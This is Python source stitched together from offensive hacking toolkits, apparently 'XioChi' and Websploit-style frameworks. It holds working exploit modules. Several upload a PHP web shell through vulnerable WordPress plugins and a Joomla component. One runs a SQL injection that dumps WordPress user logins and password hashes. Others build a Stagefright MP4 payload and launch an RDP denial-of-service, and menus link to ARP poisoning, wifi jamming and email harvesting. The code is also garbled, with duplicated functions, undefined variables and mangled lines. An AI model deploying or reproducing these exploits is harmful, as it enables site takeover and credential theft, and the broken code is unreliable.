def ibm():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/inboundiomarketing" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
ibm()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
ibm()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
ibm()
elif com[0:4] == 'help':
help.help()
ibm()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
ibm()
elif com[0:3] == 'run':
log.logger.attack('Wordpress In Boundio Marketing Started!')
exploit = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
file = open("core/shell/XioChi.php", "rb")
url = options[0]
post = {"file": file}
try:
gg = requests.post(url + exploit, files=post)
cek = requests.get(
url +
"/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XioChi.php"
)
if cek.status_code == "200":
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses(
"Shell Path : /wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XioChi.php"
)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploiting Failed!")
except Exception as e:
print(e)
ibm()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
ibm()
except (KeyboardInterrupt):
print ""
def pyc_deco():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "reversenginer/pyc_decompiler" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:9] == 'set input':
input = com[10:40]
options[0] = input
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
pyc_deco()
if com[0:10] == 'set output':
output = com[11:40]
options[1] = output
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
1]
pyc_deco()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\tRQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "INPUT\t\t" + options[0] + "\tyes\tSource Encoded"
print "OUTPUT\t\t" + options[1] + "\tyes\tOutput To Decoded"
pyc_deco()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
pyc_deco()
elif com[0:4] == 'help':
help.help()
pyc_deco()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
pyc_deco()
elif com[0:3] == 'run':
log.logger.attack('Reverse Enginer - Pyc Decompiler')
script = options[0]
output = options[1]
try:
from time import sleep
with open(output, "wb") as out:
sleep(3)
log.logger.attack('Decompile Resources...')
uncompyle6.uncompyle_file(script, out)
sleep(2)
log.logger.attack('Proccess Decompile Done...')
pyc_deco()
except Exception as e:
log.logger.error(str(e))
pyc_deco()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
pyc_deco()
except (KeyboardInterrupt):
print ""
def dwnm():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/downloads_manager" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
dwnm()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
dwnm()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
dwnm()
elif com[0:4] == 'help':
help.help()
dwnm()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
dwnm()
elif com[0:3] == 'run':
log.logger.attack('Wordpress Download Manager Exploit')
file = open('core/shell/XioChi.php', 'rb')
data = {'upfile': file, 'dm_uplpad': ''}
url = options[0]
try:
gg = requests.post(url, files=data)
cek = requests.get(
url +
"/wp-content/plugins/downloads-manager/upload/XioChi.php")
if cek.status_code == "200":
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses(
"Shell Path : /wp-content/plugins/downloads-manager/upload/XioChi.php"
)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploiting Failed!")
except Exception as e:
print(e)
dwnm()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
dwnm()
except (KeyboardInterrupt):
print ""
def mp4exploit():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "exploit/stagefright" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:6] == 'set ip':
dork = com[7:40]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Ip Addres" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
mp4exploit()
elif com[0:8] == 'set port':
pages = com[9:40]
options[1] = pages
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Port" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
mp4exploit()
elif com[0:12] == 'show options':
print(wcolors.color.YELLOW + 26 * "#" + wcolors.color.RED +
"[ Options List ]" + wcolors.color.YELLOW + 26 * "#")
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Ip\t\t" + options[
0] + "\tTarget IP Address(your Ip)"
print "Port\t\t" + options[1] + "\t\t\tPort Backconnet(you want)"
print(wcolors.color.YELLOW + 68 * "#" + wcolors.color.ENDC)
mp4exploit()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
mp4exploit()
elif com[0:4] == 'help':
help.help()
mp4exploit()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
mp4exploit()
elif com[0:3] == 'run':
log.logger.attack("Starting Creating!!")
subprocess.Popen(
'python metamodules/mp4.py -c %s -p %s -o output/Mp4Exploit.mp4>/dev/null'
% (options[0], options[1]),
shell=True).wait()
sleep(1)
asdas = subprocess.check_output(
'echo [ ${PWD}/output/Mp4Exploit.mp4 ]', shell=True)
log.logger.single("Done", " " + asdas)
print ""
mp4exploit()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
mp4exploit()
except (KeyboardInterrupt):
print ""
def hd():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/hdwebplayersql" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] =='set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[0]
dwnm()
elif com[0:12] =='show options':
print ""
print wcolors.color.CYAN+"Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED+"---------\t--------------\t\t------------------"
print wcolors.color.CYAN+"Target\t\t"+options[0]+"\tyes\tTarget ip addres"
dwnm()
elif com[0:2] =='os':
log.logger.single("Command Executed", "\n"+color.CYAN)
os.system(com[3:])
dwnm()
elif com[0:4] =='help':
help.help()
dwnm()
elif com[0:4] =='back':
pass
elif com[0:5] =='about':
about.about()
dwnm()
elif com[0:3] =='run':
log.logger.attack('Wordpress HD Web Player SQL Injection')
url = options[0]
try:
check = requests.get(url + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
if '<?xml version="' in check.text.encode('utf-8'):
Exploit = '/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11+from+wp_users--'
GoT = requests.get(site + Exploit, timeout=5)
User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
username = User_Pass[1].split(':')[0]
password = User_Pass[1].split(':')[1]
log.logger.attacksukses("Vulnerable!")
log.logger.attacksukses("Username : "******"Password : "******"Not Vulnerable")
except:
log.logger.error("Not Vulnerable")
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
dwnm()
except(KeyboardInterrupt):
print ""
def csrfcreated():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "CSRF Maker" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] =='set csrf':
dork = com[9:40]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "CSRF" + wcolors.color.RED + "]>> " +wcolors.color.YELLOW+ options[0]
csrfcreated()
elif com[0:12] =='show options':
print(wcolors.color.YELLOW + 26 * "#" +wcolors.color.RED+"[ Options List ]"+wcolors.color.YELLOW+ 26 * "#")
print wcolors.color.CYAN+"Options\t\t Value\t\t\t Description"
print wcolors.color.RED+"---------\t--------------\t\t------------------"
print wcolors.color.CYAN+"crsf\t\t"+options[0]+"\tCRSF Type Want To Create"
print(wcolors.color.YELLOW + 68 * "#"+wcolors.color.ENDC)
csrfcreated()
elif com[0:2] =='os':
log.logger.single("Command Executed", "\n"+wcolors.color.CYAN)
os.system(com[3:])
csrfcreated()
elif com[0:4] =='help':
help.help()
csrfcreated()
elif com[0:4] =='back':
pass
elif com[0:5] =='about':
about.about()
csrfcreated()
elif com[0:4] =='list':
print wcolors.color.CYAN+"clickjacking (Sorry Next Update Will Much More)"
csrfcreated()
elif com[0:3] =='run':
if options[0] =='clickjacking':
xssc = 'XSS'
line_2= line_1 + wcolors.color.RED + "[" + wcolors.color.CYAN + "%s CODE"%(xssc) + wcolors.color.RED + "]>> " + wcolors.color.ENDC
xss = raw_input(line_2)
ifrm = 'IFRAME'
line_3 = line_1 + wcolors.color.RED + "[" + wcolors.color.CYAN + "%s CODE"%(ifrm) + wcolors.color.RED + "]>> " + wcolors.color.ENDC
iframe = raw_input(line_3)
sss = iframe.replace('\n', '')
payloadcsrf.clickjacking(xss, iframe)
else:
log.logger.error("Your Options CSRF Not Found<Sorry My Payload Just Click Jacking...Wait Next Update :)")
csrfcreated()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
csrfcreated()
except(KeyboardInterrupt):
print ""
def main():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "GrimTurn" + wcolors.color.ENDC
line_1 += " > "
terminal = input(line_1)
if terminal[0:3] == 'use':
if terminal[4:15] == 'host/casper':
casper.casper()
main()
else:
print("Wrong Command =>", terminal)
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] == 'help':
help.help()
main()
elif terminal[0:2] == 'os':
os.system(terminal[3:])
main()
elif terminal[0:7] == 'upgrade':
upgrade.upgrade()
main()
elif terminal[0:6] == 'update':
update.update()
elif terminal[0:5] == 'about':
about.about()
main()
elif terminal[0:13] == 'generate_name':
print(random_name.random_name())
main()
elif terminal[0:11] == 'trusted_mac':
print(trusted_mac.trusted_mac())
main()
elif terminal[0:4] == 'exit':
print(wcolors.color.YELLOW +
"[*] Thank You For Using GrimTurn =)" + wcolors.color.ENDC)
exit()
else:
print("Wrong Command =>", terminal)
main()
except (KeyboardInterrupt):
print(wcolors.color.RED +
"\n[*] (Ctrl + C ) Detected, Trying To Exit ..." +
wcolors.color.ENDC)
print(wcolors.color.YELLOW + "[*] Thank You For Using GrimTurn =)" +
wcolors.color.ENDC)
def dorkgrablink():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "scanner/google_dork" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] == 'set dork':
dork = com[9:9999]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Dork" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
dorkgrablink()
elif com[0:8] == 'set page':
pages = com[9:40]
options[1] = pages
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Pages" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
dorkgrablink()
elif com[0:12] == 'show options':
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Dork\t\t" + options[
0] + "\tInput Dork Value"
print "Page\t\t" + options[1] + "\t\t\tMax Page Scanning"
dorkgrablink()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
dorkgrablink()
elif com[0:4] == 'help':
help.help()
dorkgrablink()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
dorkgrablink()
elif com[0:3] == 'run':
log.logger.attack("Starting Grab")
subprocess.Popen('python metamodules/scanner/grab_link.py %s %s' %
(options[0], options[1]),
shell=True).wait()
log.logger.attacksukses("Done Grabing")
dorkgrablink()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
dorkgrablink()
except (KeyboardInterrupt):
print ""
def rdpexploit():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "exploit/remote_desktop" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Target" + wcolors.color.RED + "]>> " + options[
0]
rdpexploit()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "TARGET\t\t" + options[0] + "\t\tyes\tTarget IP Address"
rdpexploit()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
rdpexploit()
elif com[0:4] == 'help':
help.help()
rdpexploit()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
rdpexploit()
elif com[0:3] == 'run':
log.logger.attack("Attacking")
subprocess.Popen(
'msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; set RHOST %s; set RPORT 3389; exploit; exit"'
% options[0],
shell=True).wait()
rdpexploit()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>>" + com
rdpexploit()
except (KeyboardInterrupt):
print ""
def main():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += " > "
terminal = raw_input(line_1)
if terminal[0:3] == 'use':
if terminal[4:20] == 'web/apache_users':
apache_users.apache_users()
main()
if terminal[4:27] == 'web/cloudflare_resolver':
cloudflare_resolver.cloudflare_resolver()
main()
elif terminal[4:20] == 'network/arp_dos':
arp_dos.arp_dos()
main()
elif terminal[4:20] == 'exploit/autopwn':
autopwn.autopwn()
main()
elif terminal[4:27] == 'exploit/browser_autopwn':
brow_autopwn.brow_autopwn()
main()
elif terminal[4:19] == 'web/dir_scanner':
directory_scanner.directory_scanner()
main()
elif terminal[4:12] == 'web/wmap':
wmap.wmap()
main()
elif terminal[4:11] == 'web/pma':
phpmyadmin.phpmyadmin()
main()
elif terminal[4:23] == 'exploit/java_applet':
java_applet.java_applet()
main()
elif terminal[4:16] == 'network/mfod':
mfod.mfod()
main()
elif terminal[4:16] == 'network/mitm':
mitm.mitm()
main()
elif terminal[4:17] == 'network/mlitm':
mlitm.mlitm()
main()
elif terminal[4:21] == 'network/webkiller':
webkiller.webkiller()
main()
elif terminal[4:24] == 'network/arp_poisoner':
arp_poisoner.arp_poisoner()
main()
elif terminal[4:22] == 'network/fakeupdate':
fakeupdate.fakeupdate()
main()
elif terminal[4:20] == 'wifi/wifi_jammer':
wifi_jammer.wifi_jammer()
main()
elif terminal[4:17] == 'wifi/wifi_dos':
wifi_dos.wifi_dos()
main()
elif terminal[4:22] == 'wifi/wifi_honeypot':
wifi_honeypot.wifi_honeypot()
main()
elif terminal[4:20] == 'wifi/mass_deauth':
mass_deauth.mass_deauth()
main()
elif terminal[4:27] == 'bluetooth/bluetooth_pod':
bluetooth_pod.bluetooth_pod()
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] == 'help':
help.help()
main()
elif terminal[0:2] == 'os':
os.system(terminal[3:])
main()
elif terminal[0:7] == 'upgrade':
upgrade.upgrade()
main()
elif terminal[0:6] == 'update':
update.update()
elif terminal[0:5] == 'about':
about.about()
main()
elif terminal[0:4] == 'exit':
exit()
else:
print "Wrong Command => ", terminal
main()
except (KeyboardInterrupt):
print(wcolors.color.RED +
"\n[*] (Ctrl + C ) Detected, Trying To Exit ..." +
wcolors.color.ENDC)
print(wcolors.color.YELLOW +
"[*] Thank You For Using Websploit Framework =)" +
wcolors.color.ENDC)
def b2j():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "joomla/com_b2jcontact" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
b2j()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
b2j()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
b2j()
elif com[0:4] == 'help':
help.help()
b2j()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
b2j()
elif com[0:3] == 'run':
try:
log.logger.attack('Joomla Component b2jcontact Exploit')
file = open("core/shell/XioChi.php", "rb")
url = options[0]
kontent = requests.get(url + '/contact')
getcid = re.findall('name="cid_(.*?)"', kontent.text)
if getcid:
print("cid value : " + str(getcid))
else:
print("cid value : null value")
getbid = re.findall('bid=(.*?)"', kontent.text)
if getbid:
print("bid value : " + str(getbid))
else:
print("bid value : null value")
try:
exploit = url + 'index.php?option=com_b2jcontact&view=loader&owner=component&id=' + str(
getcid
) + '&bid=' + str(
getbid
) + '&root=&type=uploader&&owner=component&id=' + str(
getcid) + '&qqfile=586cfc73826e4-/../XioChi.php'
uploader = open('core/shell/XioChi.php').read()
header = {
'Content_Type': 'multipart/form-data',
'Content': uploader
}
poster = requests.post(exploit, headers=header)
path = url + "/components/com_b2jcontact/uploads/XioChi.php"
checker = requests.get(path)
if "200" in path.status_code:
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses("Shell Path : " + path)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploit Failed")
except Exception as e:
print(e)
b2j()
except Exception as err:
log.logger.error(str(err))
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
b2j()
except (KeyboardInterrupt):
print ""
def learndash1():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/learndash" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[
0]
learndash1()
elif com[0:12] == 'show options':
print ""
print wcolors.color.CYAN + "Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Target\t\t" + options[
0] + "\tyes\tTarget ip addres"
learndash1()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + color.CYAN)
os.system(com[3:])
learndash1()
elif com[0:4] == 'help':
help.help()
learndash1()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
learndash1()
elif com[0:3] == 'run':
log.logger.attack('Wordpress Learndash Exploit v1')
file = open('core/shell/XioChi.php.php', 'rb')
header = {
'Content_type': 'multipart/form-data',
'post': 'foobar',
'course_id': 'foobar',
'uploadfile': 'foobar'
}
data = {'uploadfiles': file}
url = options[0]
try:
gg = requests.post(url, headers=header, files=data)
cek = requests.get(
url + "/wp-content/uploads/assignments/XioChi.php.")
if cek.status_code == "200":
log.logger.attacksukses("Vulnerable")
log.logger.attacksukses(
"Shell Path : /wp-content/uploads/assignments/XioChi.php."
)
log.logger.attacksukses("Password Shell : jancox")
else:
log.logger.error("Not Vulnerable! Exploiting Failed!")
except Exception as e:
print(e)
learndash1()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
learndash1()
except (KeyboardInterrupt):
print ""
def admin():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "scanner/admin_panel" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:10] == 'set target':
dork = com[11:9999]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "TARGET" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
admin()
elif com[0:12] == 'set wordlist':
dork = com[13:9999]
options[1] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "WORDLIST" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
admin()
elif com[0:12] == 'show options':
print("Options\t\tValue\t\t\t\tDescription")
print wcolors.color.RED + "---------\t-----------\t\t\t-----------" + wcolors.color.ENDC
print "TARGET\t\t" + options[0] + "\t\tSet Target Value"
print "WORDLIST\t" + options[1] + "\t\tSet Path Wordlist"
print ''
admin()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
admin()
elif com[0:4] == 'help':
help.help()
admin()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
admin()
elif com[0:3] == 'run':
log.logger.info("Checking Wordlist..!!")
sleep(1)
try:
s = open(options[1], 'r')
log.logger.sukses("File Found")
aol = set(open(options[1]).readlines())
open(options[1], 'w').writelines(set(aol))
log.logger.attacksukses1("List Total", len(list(aol)))
sleep(1)
save = open('output/adminvalid.txt', 'a')
log.logger.attack("Starting Finding Panel")
for i in s.readlines():
try:
p = options[0] + '/' + i.strip()
r = requests.get(p)
try:
if r.status_code in (200, 302):
log.logger.attacksukses1(
"Admin Panel Found", str(p))
save.write("\n" + '[' + "Website" + "]>>" +
"[" + options[0] + ']' + '\n' +
str(p) + "\n")
else:
log.logger.error1("Not Found",
wcolors.color.RED + str(p))
except (KeyboardInterrupt):
print ""
except (requests.exceptions.SSLError):
log.logger.error(
"SSL Error...We cant visit this website with much request"
)
log.logger.error("Plase Wait Delay...")
sleep(10)
except (requests.exceptions.ConnectionError):
log.logger.error(
"Connection Error <Failed to establish a new connection>"
)
except (requests.exceptions.InvalidURL):
log.logger.error(
"Invalid Url check :// <http://> or <https://>")
admin()
except (requests.exceptions.MissingSchema):
log.logger.error("Please Using http:// or https://")
admin()
except (requests.exceptions.InvalidSchema):
log.logger.error("Invalid URL >>" + options[0])
sleep(1)
admin()
except (KeyboardInterrupt):
print ""
save.close()
aol = set(open('output/adminvalid.txt').readlines())
open('output/adminvalid.txt', 'w').writelines(set(aol))
log.logger.attacksukses1("Saved On", 'output/adminvalid.txt')
log.logger.attacksukses("Done..!!")
except (KeyboardInterrupt):
print ""
admin()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
admin()
except (KeyboardInterrupt):
print ""
def start(): about.about() main()
def main():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += " > "
terminal = raw_input(line_1)
if terminal[0:3] =='use':
if terminal[4:20] =='web/apache_users':
apache_users.apache_users()
main()
if terminal[4:27] =='web/cloudflare_resolver':
cloudflare_resolver.cloudflare_resolver()
main()
elif terminal[4:20] =='network/arp_dos':
arp_dos.arp_dos()
main()
elif terminal[4:20] =='exploit/autopwn':
autopwn.autopwn()
main()
elif terminal[4:27] =='exploit/browser_autopwn':
brow_autopwn.brow_autopwn()
main()
elif terminal[4:19] == 'web/dir_scanner':
directory_scanner.directory_scanner()
main()
elif terminal[4:12] =='web/wmap':
wmap.wmap()
main()
elif terminal[4:11] =='web/pma':
phpmyadmin.phpmyadmin()
main()
elif terminal[4:23] =='exploit/java_applet':
java_applet.java_applet()
main()
elif terminal[4:16] =='network/mfod':
mfod.mfod()
main()
elif terminal[4:16] =='network/mitm':
mitm.mitm()
main()
elif terminal[4:17] =='network/mlitm':
mlitm.mlitm()
main()
elif terminal[4:21] =='network/webkiller':
webkiller.webkiller()
main()
elif terminal[4:24] =='network/arp_poisoner':
arp_poisoner.arp_poisoner()
main()
elif terminal[4:22] =='network/fakeupdate':
fakeupdate.fakeupdate()
main()
elif terminal[4:20] =='wifi/wifi_jammer':
wifi_jammer.wifi_jammer()
main()
elif terminal[4:17] =='wifi/wifi_dos':
wifi_dos.wifi_dos()
main()
elif terminal[4:22] =='wifi/wifi_honeypot':
wifi_honeypot.wifi_honeypot()
main()
elif terminal[4:20] =='wifi/mass_deauth':
mass_deauth.mass_deauth()
main()
elif terminal[4:27] =='bluetooth/bluetooth_pod':
bluetooth_pod.bluetooth_pod()
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] =='help':
help.help()
main()
elif terminal[0:2] =='os':
os.system(terminal[3:])
main()
elif terminal[0:7] =='upgrade':
upgrade.upgrade()
main()
elif terminal[0:6] =='update':
update.update()
elif terminal[0:5] =='about':
about.about()
main()
elif terminal[0:4] =='exit':
exit()
else:
print "Wrong Command => ", terminal
main()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Trying To Exit ..." + wcolors.color.ENDC)
print(wcolors.color.YELLOW + "[*] Thank You For Using Websploit Framework =)" + wcolors.color.ENDC)
def emailfilter():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "Email Filter" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] == 'set list':
dork = com[9:100]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Email List" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
emailfilter()
elif com[0:12] == 'show options':
print(wcolors.color.YELLOW + 26 * "#" + wcolors.color.RED +
"[ Options List ]" + wcolors.color.YELLOW + 26 * "#")
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "List\t\t" + options[
0] + "\tList of email (on .txt)"
print(wcolors.color.YELLOW + 68 * "#" + wcolors.color.ENDC)
emailfilter()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
emailfilter()
elif com[0:4] == 'help':
help.help()
emailfilter()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
emailfilter()
elif com[0:3] == 'run':
log.logger.info("Checking Path Of List!!")
sleep(1)
p = Path(options[0])
yahoo = "yahoo.com"
gmail = "gmail.com"
aol = "aol.com"
hotmail = "hotmail.com"
outlook = "outlook.com"
count = 1
bot = 1
count1 = 1
count2 = 1
cc = 1
try:
text = open(options[0], 'r')
read = text.read()
log.logger.sukses("File Found")
match1 = re.findall(r'[\w\.-]+@' + yahoo, read)
match2 = re.findall(r'[\w\.-]+@' + gmail, read)
match3 = re.findall(r'[\w\.-]+@' + hotmail, read)
match4 = re.findall(r'[\w\.-]+@' + aol, read)
outmail = re.findall(r'[\w\.-]+@' + outlook, read)
alltext = re.findall(r'[\w\.-]+@[\w\.-]+', read)
result1 = list(set(match1))
result2 = list(set(match2))
result3 = list(set(match3))
result4 = list(set(match4))
result5 = list(set(outmail))
result6 = list(set(alltext))
print ""
yahoo = open('output/yahoo.txt', 'a')
aol = open('output/aol.txt', 'a')
hotmail = open('output/hotmail.txt', 'a')
gmail = open('output/gmail.txt', 'a')
out = open('output/outlook.txt', 'a')
for yah in result1:
log.logger.single1(count, "[Yahoo]>>", yah)
count += 1
yahoo.write(yah + "\n")
for ao in result4:
log.logger.single1(bot, "[Aol]>>", ao)
bot += 1
aol.write(ao + "\n")
for hot in result3:
log.logger.single1(count1, "[Hotmail]>>", hot)
count1 += 1
hotmail.write(hot + "\n")
for notident in result5:
